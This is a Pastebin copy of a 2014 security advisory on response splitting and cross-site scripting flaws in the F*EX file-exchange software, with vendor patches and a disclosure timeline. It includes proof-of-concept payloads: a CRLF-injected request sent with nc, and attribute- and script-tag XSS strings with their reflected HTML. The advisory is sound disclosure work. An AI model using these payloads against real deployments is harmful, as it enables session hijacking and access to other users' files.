Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting
- Date add 2014-06-06
- Category web applications
- Platform multiple
- Risk [<font color="#FFFF00">Security Risk Medium</font>]
- Description F*EX version 20140313-1 suffers from HTTP response splitting and cross site scripting vulnerabilities.
- CVE CVE-2014-3875,
- CVE-2014-3876,
- CVE-2014-3877
- ========================================
- F*EX (Frams' Fast File EXchange) - Multiple Issues
- - - ---------------------------------------------------------------------
- Affected Versions
- =================
- F*EX (Frams' Fast File EXchange) 20140313-1 as shipped with debian,
- version fex-20140530 and later are not affected.
- Issue Overview
- ==============
- Technical Risk: medium
- Likelihood of Exploitation: high
- Vendor: Universität Stuttgart
- Vendor URL: http://fex.rus.uni-stuttgart.de/
- Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
- Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-22.txt
- Advisory Status: Public
- CVE-Number: CVE-2014-3875, CVE-2014-3876, CVE-2014-3877
- Impact
- ======
- It is possible to attack user sessions and to execute JavaScript in
- another users browser. This might enable an attacker to gain access to files
- which are intended for other users of the platform.
- Issue Description
- =================
- While conducting an internal evaluation of the software, LSE Leading
- Security Experts GmbH discovered multiple, remotely exploitable issues with
- F*EX.
- 1) HTTP Response splitting in rup
- CVE-Number: CVE-2014-3875
- When inserting encoded newline characters into a request to rup, additional
- HTTP headers can be injected into the reply, as well as new HTML code on the
- top of the website.
- - ----------------8<-------------
- $ nc 127.0.0.1 8888
- GET /rup?akey=test%0d%0a%0d%0aHELLO HTTP/1.0
- HTTP/1.1 200 OK
- X-Message: OK
- Server: fexsrv
- Expires: 0
- Cache-Control: no-cache
- X-Frame-Options: SAMEORIGIN
- Set-Cookie: akey=test
- HELLO; Max-Age=9999; Discard
- Content-Type: text/html; charset=UTF-8
- <html>
- <head>
- ...
- - ----------------8<-------------
- The same attack is possible using a POST request.
- 2) Cross-Site-Scripting issue in rup
- CVE-Number: CVE-2014-3876
- The parameter akey is reflected unfiltered as part of the HTML page. Some
- characters are forbidden in the GET parameter due to filtering of the
- URL, but this can be circumvented by using a POST parameter.
- Nevertheless, this issue is exploitable via the GET parameter alone,
- with some user interaction.
- Opening the following URL opens a popup window, when the cursor
- moves over the back link on the bottom of the page:
- http://127.0.0.1:8888/rup?akey=foo" onmouseover=alert(1) bar="
- - ----------------8<-------------
- <p>
- <a href="/foc?akey=wow" onmouseover=alert(1) foo="">back to F*EX
- operation control</a>
- </body></html>
- - ----------------8<-------------
- 3) Cross-Site-Scripting issue in fup
- CVE-Number: CVE-2014-3877
- The parameter addto is reflected only slightly filtered back to
- the user as part of the HTML page. Some characters are forbidden in the GET
- parameter due to filtering of the URL, but this can be circumvented by
- using a POST parameter. Nevertheless, this issue is exploitable via the GET
- parameter alone, with some user interaction.
- Opening the following URL opens a popup window, when the cursor
- moves over the recipient entry field:
- http://127.0.0.1:8888/fup?addto=%22onmouseover=alert%281%29;bar=%22
- - ----------------8<-------------
- <tr title="e-mail address or alias"><td>recipient(s):
- <td><input type="text" name="to" size="96"
- value=""onmouseover=alert(1);bar=""><br>
- </tr>
- - ----------------8<-------------
- 4) Cross-Site-Scripting issue in fuc
- CVE-Number: CVE-2014-3876
- The POST parameter disclaimer is reflected back to the user as part of the
- HTML page.
- Setting the disclaimer POST parameter in the change disclaimer
- operation (http://127.0.0.1:8888/fuc?
- disclaimer=CHANGE&akey=2409d2a55e5acfa407929fb10cb8335f) to the
- following value
- - ----------------8<-------------
- '"><script>alert(1)</script>
- - ----------------8<-------------
- will results in the following HTML code, which opens a popup window:
- - ----------------8<-------------
- <pre>
- '"><script>alert(1)</script>
- </pre>
- <p>
- - ----------------8<-------------
- An additional attack is possible using the gm POST parameter, by setting
- it to malicious HTML code and supplying a GET parameter group.
- It looks like other values might be affected as well, since
- only limited filtering is performed in the CGI parameter
- evaluation.
- Temporary Workaround and Fix
- ============================
- LSE Leading Security Experts GmbH advises to deactivate F*EX until the
- vendor
- publishes a complete fix. LSE Leading Security Experts GmbH recommends to
- implement proper filtering mechanisms for all parameters and the
- implementation
- of proper output encoding before reflecting values back to the user.
- 1) HTTP Response splitting in rup
- - --- rup.orig 2014-05-23 08:50:01.558808000 +0200
- +++ rup 2014-05-23 08:55:03.182808000 +0200
- @@ -35,6 +35,7 @@ foreach my $v (param) {
- $vv =~ s/[<>]//g;
- if ($v =~ /^akey$/i) {
- $vv =~ s:[/.]::g;
- + $vv =~ s/[\W]//g;
- $akey = untaint($vv);
- } elsif ($v =~ /^(from|user)$/i) {
- $from = normalize_address($vv);
- 2) Cross-Site-Scripting issue in rup
- The patch from 1) is sufficient to fix this issue as well.
- 3) Cross-Site-Scripting issue in fup
- - --- fup.orig 2014-05-23 09:26:12.514808000 +0200
- +++ fup 2014-05-23 09:26:53.794808000 +0200
- @@ -2551,7 +2551,7 @@ sub setparam {
- $replyto = untaint($replyto);
- } elsif ($v eq 'ADDTO') {
- $vv =~ s/\s.*//;
- - - $vv =~ s/[<>]//g;
- + $vv =~ s/[<>"']//g;
- $addto = untaint(lc($vv)); # if checkaddress($vv);
- } elsif ($v eq 'SUBMIT') {
- $submit = $vv;
- 4) Cross-Site-Scripting issue in fuc
- No workaround from LSE. All parameters need to be filtered properly
- and HTML encoded when reflected back to the user.
- History
- =======
- 2014-05-22 Issue discovered
- 2014-05-23 Issue reported
- 2014-05-23 Vendor reply
- 2014-05-26 Internal test version supplied by vendor
- 2014-05-26 Vendor releases a patch
- 2014-05-30 CVE-Numbers assigned
- 2014-06-03 Advisory released
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement